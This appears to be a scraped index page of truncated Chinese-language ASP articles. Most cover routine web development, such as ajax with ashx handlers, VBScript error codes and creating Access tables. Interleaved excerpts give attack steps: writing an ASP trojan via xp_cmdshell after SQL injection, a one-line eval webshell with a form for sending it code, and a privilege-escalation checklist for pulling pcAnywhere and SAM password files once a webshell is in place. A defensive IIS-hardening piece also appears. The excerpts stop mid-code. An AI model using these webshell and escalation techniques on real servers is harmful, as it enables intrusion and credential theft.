ASP

摘自 lake2這個東東弄得沸沸揚揚，要是你還不知道的話就看看《添加超級使用者的.asp代碼》這文章吧。    作者也說了，“反正代碼是對的，但是很少能成功，具體的看運氣了”，偶也拿來在webshell上試了試，失敗了。把容錯語句去掉，看到錯誤原因是“許可權不夠”。今天沒什麼事，就來分析分析，說不定……嘿嘿。    他代碼關鍵是這個： set

本文適合有sa許可權sqlserver資料庫、並且能sql注入支援fso+asp的伺服器     SQL注入後，如何上傳木馬，一直是比較頭疼的事，我這裡提供上傳木馬的一種另一種方法。    1、SQL注入的時候，用xp_cmdshell 向伺服器上寫入一個能寫檔案的asp檔案。    檔案內容：<%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")Set

錯誤描述：無法序列化工作階段狀態。在“StateServer”或“SQLServer”模式下，ASP.NET 將序列化工作階段狀態對象，因此不允許使用無法序列化的對象或 MarshalByRef 對象。如果自訂工作階段狀態儲存在“Custom”模式下執行了類似的序列化，則適用同樣的限制。問題描述：        我使用了struct 結構體型Bill，並把多個struct

版本一：html頁面<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>

注意的問題：1：建立的html 的尾碼是htm2:  .ashx 裡的那些需要引號，那些是不需要的a.html<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>

ajax asp.net ashx用法前端頁面:<%@ Page Language="C#" AutoEventWireup="true" CodeFile="ajax.aspx.cs" Inherits="About_ajax" %><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

'做一個完全動態密碼，讓相同的密碼產生不同的結果'密碼aaa經過第一次運算後結果為：'jlce1d65ec3b91556234879c9db8f6da1123'第二次：'hjmnbe0d01cc1fbd3e18ae7431fa52fb3ce4'第三次：'grttb05901915e121d83ebefad7e809ef1b0'... ...'當然，亦可還原比較'以下我根據動網MD5函數修改後的代碼，'======================================='= word

運行test.htm後進行密碼登陸測試~！-------------------------test.htm代碼如下：<HTML><HEAD><TITLE></TITLE><meta HTTP-EQUIV="refresh" CONTENT="5"></HEAD><BODY><iframe src="test.asp" width=859 height=406 name="top" frameborder=

首先在asp檔案中寫如<%execute request("value")%>代碼然後在本地寫個表單<form action=http://www.bingke.net/asp.asp method=post><textarea name=value cols=120 rows=10 width=45> set lP=server.createObject("Adodb.Stream") lP.Open lP.Type=2 lP.CharSet="gb2312

注意：本文所講述之設定方法與環境：適用於Microsoft Windows 2000 Server/Win2003 SERVER 　 IIS5.0/IIS6.0 　　 　　1、首先我們來看看一般ASP木馬、Webshell所利用的ASP組件有那些？我們以海洋木馬為列： 　　<object runat="server" id="ws" scope="page" classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8">

本篇文章結合了許多高手提升許可權的技巧和自己的一些想法當我們取得一個webshell時候，下一部要做的就是提升許可權個人總結如下：1: C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/看能否跳轉到這個目錄，如果行那就最好了，直接下它的CIF檔案，得到pcAnywhere密碼，登陸ps: 破解工具本站已提供。請自己Search一下！2.C:/WINNT/system32/config/進這裡下它的SA

文章作者：sunlion[E.S.T]（血舞[E.S.T]）資訊來源：邪惡八進位 中國上次寫了一篇關於參數過濾的文章，記得那時用的是instr函數，只是進行了某個參數的比較，要使能過濾很多的參數，那麼要在比較區內加上大量的過濾符號，今天，也就是今天，筆者給大家帶來一個更加完美的過濾方式，就是用到微軟的VBscript裡面的一個isnumeric（）函數！好了，廢話少說，先來看看他的描述與用法：IsNumeric 函數 描述返回 Boolean 值指明運算式的值是否為數字。文法IsNumeric(

Microsoft VBScript語&#x6CD5;錯誤(0x800A03E9)-->記憶體不足Microsoft VBScript語&#x6CD5;錯誤(0x800A03EA)-->語&#x6CD5;錯誤Microsoft VBScript語&#x6CD5;錯誤(0x800A03EB)-->缺少 ':'Microsoft VBScript語&#x6CD5;錯誤(0x800A03ED)-->缺少 '('Microsoft

————————————————————————————<%dim objon error resume nextfor each obj in getObject("WinNT://.")err.clear%><!--<%=obj.path%>--><%if err then%>系統使用者(組)<%else%>系統進程<%end if%><%=obj.Name%><%if err

把asp程式作成dll很多好處，但是有一點，該dll必須註冊才能在asp中調用。如果是自己的伺服器那還好，但如果是租用的虛擬伺服器，就沒辦法使用了。怎樣在遠程主機上註冊我們的dll呢？在伺服器端使用Shell！！！ 讓我們先將自己的dll檔案通過ftp或http上傳到伺服器上，然後作一個asp程式，調用WScript.Shell來  執行regsvr32命令：  Set oShell = CreateObject ("WScript.Shell")  oShell.Run

//copyright 32768 2004<br><%dim objon error resume nextfor each obj in getObject("WinNT://.")err.clear%><!--<%=obj.path%>--><%if err then%>系統使用者(組)<%else%>系統進程<%end if%><%=obj.Name%><%if err

在微軟的.NET戰略開始以來，已有不少的主機支援.NET了。這裡羅嗦兩句，2003是支援.NET的，要想2000和XP支援.NET就需要去微軟下載.NET Framework（這裡有下：http://www.microsoft.com/downloads/details.aspx?FamilyID=262d25e3-f589-4842-8157-034d1e7cf3a3&displaylang=zh-cn）。嗯，好了，現在切入正題。   

function clearHTMLCode(Code) Dim objRegExp set objRegExp = new RegExp objRegExp.IgnoreCase = True'忽略大小寫 objRegExp.Global=True '全欄位有效,否則只是替換第一個符合的字串 objRegExp.Pattern="<[^<>]+>" '以"<"開始">"結束的中間不包含"<",">"字元,+號表示貪婪匹配,儘可能多的[^<&

         無論是在我們平時上網、發郵件、辦公、學習和生活中經常會輸入一些資料，比如社會安全號碼、郵件帳號、數字、漢字、數字字母組合，或者符合某一個規格的輸入資料，這是我們想要的輸入結果，而結果往往令人差強人意，我們希望使用者輸入數字，他偏偏輸入漢字，因此軟體可能會出現未知錯誤，使用者使用系統的效率也會因此而降低，那麼怎麼才能解決這一問題呢？         這需要用到一組驗證控制項，它們常用而方便為我們提供了驗證功能，下面讓我們看一看它們如何使用。        

ASP建立ACCESS表或添加欄位轉自：http://www.wesoho.com/article.asp?id=2226  揚帆blog建立一張空表：Sql="Create TABLE [表名]"建立一張有欄位的表：Sql="Create TABLE [表名]([欄位名1] MEMO NOT NULL, [欄位名2] MEMO, [欄位名3] COUNTER NOT NULL, [欄位名4] DATETIME, [欄位名5] TEXT(200), [欄位名6] TEXT(200))欄位類型：